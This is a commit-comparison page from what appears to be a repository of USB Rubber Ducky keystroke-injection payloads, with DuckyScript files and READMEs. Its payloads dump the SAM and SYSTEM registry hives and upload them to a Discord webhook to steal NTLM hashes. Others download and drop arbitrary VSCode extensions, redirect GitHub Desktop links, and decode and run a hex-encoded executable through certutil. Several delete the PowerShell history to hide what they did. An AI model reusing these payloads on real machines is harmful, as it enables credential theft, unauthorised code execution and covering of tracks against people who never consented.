Compare commits

...

33 Commits

Author SHA1 Message Date
Aleff 52086d7968
Merge 82fcf60fab into 675972662a 2024-10-05 22:49:16 +02:00
Peaks 675972662a
Merge pull request #484 from luu176/master
Exfiltrate NTLM hash using DS3
2024-09-24 19:27:52 -04:00
Luu 0df3011601
Update README.md 2024-09-25 00:23:30 +02:00
Luu a81ecd3e64
Update payload.txt 2024-09-25 00:21:49 +02:00
Luu c898ed7858
Create README.md 2024-09-25 00:20:06 +02:00
Luu 15f8f25701
Create payload.txt 2024-09-25 00:18:39 +02:00
Peaks adb9af43f8
Merge pull request #482 from aleff-github/patch-94
Same File Name Prank
2024-09-24 15:48:16 -04:00
Aleff 3cf199170c Update payload 2024-09-21 09:41:51 +02:00
Peaks fd272a60f4
Merge pull request #480 from aleff-github/patch-93
Replace Links In GithubDesktop
2024-09-20 14:03:29 -04:00
Aleff 9f1222ba05
Update payload.txt 2024-09-19 19:55:47 +02:00
Aleff d934d9d4de
removed a debug print 2024-09-18 19:31:24 +02:00
Aleff f031b928a8
Simple shifts in comments 2024-09-18 19:28:22 +02:00
Aleff bb89731ae2
Update payload.txt 2024-09-18 19:27:12 +02:00
Aleff 9c4257edbd Update README.md 2024-09-18 19:22:27 +02:00
Aleff d3e494fd12 Rename Everything Similarly
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.

Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.

![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)

> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.

![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)

> What it looks like instead if you turn on the extension view.
2024-09-18 19:21:22 +02:00
Peaks 02641718a0
Merge pull request #478 from aleff-github/patch-91
Install Any Arbitrary VSCode Extension
2024-09-17 18:06:23 -04:00
Aleff 2c84ff499c
Update payload.txt 2024-09-17 10:23:40 +02:00
Peaks 7883e2bc50
Merge pull request #479 from aleff-github/patch-92
Install Official VSCode Extension
2024-09-17 03:11:42 -04:00
Alessandro Greco b1fae99ade Update README.md 2024-09-16 14:54:17 +02:00
Alessandro Greco 52c42dfc10 Merge branch 'patch-93' of https://github.com/aleff-github/usbrubberducky-payloads into patch-93 2024-09-16 14:43:34 +02:00
Alessandro Greco 6e3f5924c0 Update payload.txt 2024-09-16 14:43:00 +02:00
Aleff 71d5eaf378
Bug in renderer regex
the link api.github.com needs to be correct
2024-09-16 14:42:11 +02:00
Alessandro Greco 1fa6cea874 [+] Replace Links In GithubDesktop
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user.
2024-09-16 14:30:19 +02:00
Aleff e5254c68a2
Update README.md
[+] Credits
2024-09-05 13:15:56 +02:00
Alessandro Greco d350174b13 Install Official VSCode Extension
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems.

The extension to be installed is specified via the `publisher.extensionName` parameter.

The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
2024-09-05 13:11:53 +02:00
Alessandro Greco 284195f4cd Install Any Arbitrary VSCode Extension
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:

1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.

The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
2024-09-05 09:52:58 +02:00
Alessandro Greco 82fcf60fab [+] PASSIVE WINDOWS DETECT 2024-08-26 07:20:34 +02:00
aleff-github fe6c828d62 Removed hex var with example 2023-10-19 08:38:07 +02:00
aleff-github 39ae8691ff Removed parts not accepted && Added description of Prank 2023-10-18 10:19:44 +02:00
Aleff 3f27f53b23
Update README.md 2023-06-16 23:27:01 +02:00
aleff-github 8c4ced3125 Removing Executables 2023-06-14 15:46:56 +02:00
aleff-github d44fd457a3 readme 2023-06-14 11:42:34 +02:00
Aleff 4ca40bc5a8
Pranh(ex) 2023-06-14 11:41:34 +02:00
16 changed files with 1083 additions and 0 deletions

View File

@ -0,0 +1,98 @@
# Install Any Arbitrary VSCode Extension
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
## First Of All!
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
So...
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
- Always check the source and source code before doing this
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
## Features
- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
- Removes any previous version of the extension.
- Completely automated, requiring no manual intervention once the script is executed.
## Requirements
- **Target OS**: Windows 10/11
- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
## Usage
### DuckyScript Configuration
Before running the script, make sure to configure the following two variables in the script:
1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
```plaintext
DEFINE #EXTENSION_NAME example
```
Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
```plaintext
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
```
### PowerShell Commands Breakdown
- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
```powershell
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
```
- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
```powershell
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
}
```
## Notes
- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
- Make sure that PowerShell is available on the target machine.
- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,88 @@
REM_BLOCK
##########################################################
# #
# Title : Install Any Arbitrary VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10 #
# #
##########################################################
END_REM
REM Replace "example" with the name of the extension folder
DEFINE #EXTENSION_NAME example
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
END_STRINGLN
REM May it depends by the extension...
DELAY 2000
STRINGLN_POWERSHELL
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
}
END_STRINGLN

View File

@ -0,0 +1,55 @@
# Install Official VSCode Extension
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
## First Of All!
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
So...
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
- Always check the source and source code before doing this
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
## Features
- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.
- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.
- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.
- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.
## Usage
### Required Parameter
- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).
## Requirements
- **Operating System**: Windows 10 or 11
- **PowerShell**
- **Visual Studio Code**
- **Internet**
- **Permissions to execute commands in PowerShell**
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,64 @@
REM_BLOCK
#####################################################
# #
# Title : Install Official VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'
DEFINE #EXTENSION publisher.extensionName
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit

View File

@ -0,0 +1,69 @@
# Replace Links In GithubDesktop
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
## Table of Contents
- [Features](#features)
- [Prerequisites](#prerequisites)
- [Usage](#usage)
- [Credits](#credits)
## Features
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
1. Detects the installation folder of GitHub Desktop.
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
## Prerequisites
- **Windows 10/11**
- **GitHub Desktop** installed on the machine.
## Usage
1. **Modify the script**:
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
```duckyscript
DEFINE #NEW_LINK example.com
```
2. **Customization**:
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
```ducky
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
```
3. **Execution**:
- Upon execution, the script will:
- Open PowerShell.
- Detect the GitHub Desktop installation directory.
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,109 @@
REM_BLOCK
#####################################################
# #
# Title : Replace Links In GithubDesktop #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM REQUIRED - Define here the new url that will replace the original github link
DEFINE #NEW_LINK example.com
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
$versions = $folders | ForEach-Object {
[PSCustomObject]@{
FolderName = $_.Name
Version = [version]($_.Name -replace "app-", "")
}
}
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
$latestFolderPath += "\resources\app\"
$renderer = "renderer.js"
$main = "main.js"
$filePath = "$latestFolderPath$renderer"
$fileContent = Get-Content $filePath
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
Set-Content -Path $filePath -Value $modifiedContent
$filePath = "$latestFolderPath$main"
$fileContent = Get-Content $filePath
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN

View File

@ -0,0 +1,28 @@
# Exfiltrate NTLM Hash - Windows ✅
A script used to exfiltrate the NTLM hash on a Windows machine.
## Description
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
### Settings
* Set the Discord webhook URL
* Ensure the webhook permissions are configured
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,34 @@
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
GUI d
DELAY 1000
GUI r
DELAY 1000
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 3000
LEFTARROW
ENTER
DELAY 3000
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
DELAY 500
GUI d

View File

@ -0,0 +1,74 @@
# Pranh(ex)
This script is named Prenh(ex) because it is the union between **Prank**, the payload section of Hak5, and hex which represents the heart of the payload itself since it is installed following a conversion to **hexadecimal**. This script also contains a Time-Based **Easter Egg** so if you want to enjoy the joke don't read the code and wait a few seconds. ^^
Executables have been removed for security reasons.
**Category**: Prank
![](assets/1.gif)
## Description
This script is named Prenh(ex) because it is the union between Prank, the payload section of Hak5, and hex which represents the heart of the payload itself since it is installed following a conversion to hexadecimal. This script also contains a Time-Based Easter Egg so if you want to enjoy the joke don't read the code and wait a few seconds. ^^
Installing and running executables on machines without explicit owner authorization can **lead to significant damage** both to the **machine** and **legal repercussions** for those who choose to do so. It is crucial to respect ownership rights and seek proper authorization to ensure the security and integrity of the system while staying within the boundaries of the law.
## Explanation of Prank
This Python script is designed to be a playful prank, creating a series of unexpected and humorous pop-up messages that make it challenging for the user to close the windows. It utilizes the ctypes library to interact with the Windows API for displaying message boxes with customized icons and button options. The code defines a function, show_error_popup, which takes a message as input and enters an infinite loop, constantly prompting the user with pop-up messages. These messages employ amusing responses to user interactions, such as changing the message text or providing comical feedback. Overall, it's a lighthearted piece of code that aims to entertain and surprise anyone who runs it.
1. You import the necessary libraries, such as ctypes and sleep.
2. You define a show_error_popup function that takes a message as an argument.
3. Inside this function, you start an infinite while loop.
4. You use ctypes.windll.user32.MessageBoxW to create a popup with the specified message. This popup has an error icon (MB_ICONERROR) and a single "OK" button (MB_OK).
5. You check the result returned by the dialog window. If the user clicks "OK" (returned value 1), the message is changed to "What do you believe yourself? That I leave so easily?" and the popup is reopened.
6. If the user clicks "Cancel" (returned value 2), a second popup is displayed with the message "Are you sure you want to close? I will miss you :'(". This popup has an error icon (MB_ICONERROR) and two buttons: "Yes" and "No."
7. If the user clicks "Yes" (returned value 6) in the second popup, a third popup appears with the message "Okay, I'll stop. But don't get mad...". This popup has an information icon (MB_ICONINFORMATION), and the loop is terminated, thus closing the popup.
8. If the user clicks "No" in the second popup, the message is changed to "You seem a little indecisive honestly...", and the popup is reopened.
9. Finally, the show_error_popup function is called with an initial error message, and the popup will be opened. After the user interacts with the popup, there is a 60-second delay before a final popup is displayed with a farewell message.
In summary, the code creates a popup that playfully teases the user, making it challenging to close, and providing some humorous responses to user clicks. It's a little prank that might bring a smile to anyone who runs it.
## Dependencies
* **Nothing** (i know, it's absurd)
## Note
- For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`
- Tested on `Windows 11`
- Running checked but not blocked by Avast antivirus
- Original Python code in `assets/pranh(ex).py`
- Hex content in `assets/hexfile.txt`
- exe file in `assets/pranh(ex).exe`
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

Binary file not shown.

After

Width:  |  Height:  |  Size: 837 KiB

View File

@ -0,0 +1 @@
Executables have been removed for security reasons.

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,22 @@
import ctypes
from time import sleep
def show_error_popup(message):
while True:
result = ctypes.windll.user32.MessageBoxW(None, message, 'Errore', 0x10 | 0x1) # 0x10 = MB_ICONERROR, 0x1 = MB_OK
if result == 1: # 1 is OK
message = "What do you believe yourself? That I leave so easily?"
continue # Open the popup
elif result == 2: # 2 is Cancel
result = ctypes.windll.user32.MessageBoxW(None, "Are you sure you want to close? I will miss you :'(", 'Chiusura', 0x10 | 0x4) # 0x10 = MB_ICONERROR, 0x4 = MB_YESNO
if result == 6: # 6 is "Yes"
ctypes.windll.user32.MessageBoxW(None, "Okay, I'll stop. But don't get mad...", 'Informazione', 0x40) # 0x40 = MB_ICONINFORMATION
break # Close the popup
else:
message = "You seem a little indecisive honestly...."
continue # Open the popup
error_message = "Yoh bro be very careful with executables!"
show_error_popup(error_message)
sleep(60) # Time-Based Easter Egg ^^
ctypes.windll.user32.MessageBoxW(None, "However, know that you remain in my heart, yay for DuckyScrip and Hak5. ^^", 'Informazione', 0x40)

View File

@ -0,0 +1,100 @@
REM_BLOCK
##################################
# #
# Title : Pranh(ex) #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
##################################
END_REM
Plug-And-Play <3
REM_BLOCK
Requirements:
- Nothing (i know, it's absurd)
Note:
- For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`
- Tested on Windows 11
- Running checked but not blocked by Avast antivirus
- Original Python code in assets/pranh(ex).py
- Hex content in assets/hexfile.txt
- exe file in assets/pranh(ex).exe
END_REM
REM Here you should put your HEX code
DEFINE #HEX_CODE example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING notepad.exe
ENTER
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\pranhex.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\pranhex.hex" "%TEMP%\pranhex.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\pranhex.exe"
ENTER

View File

@ -0,0 +1,118 @@
# Same File Name Prank
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
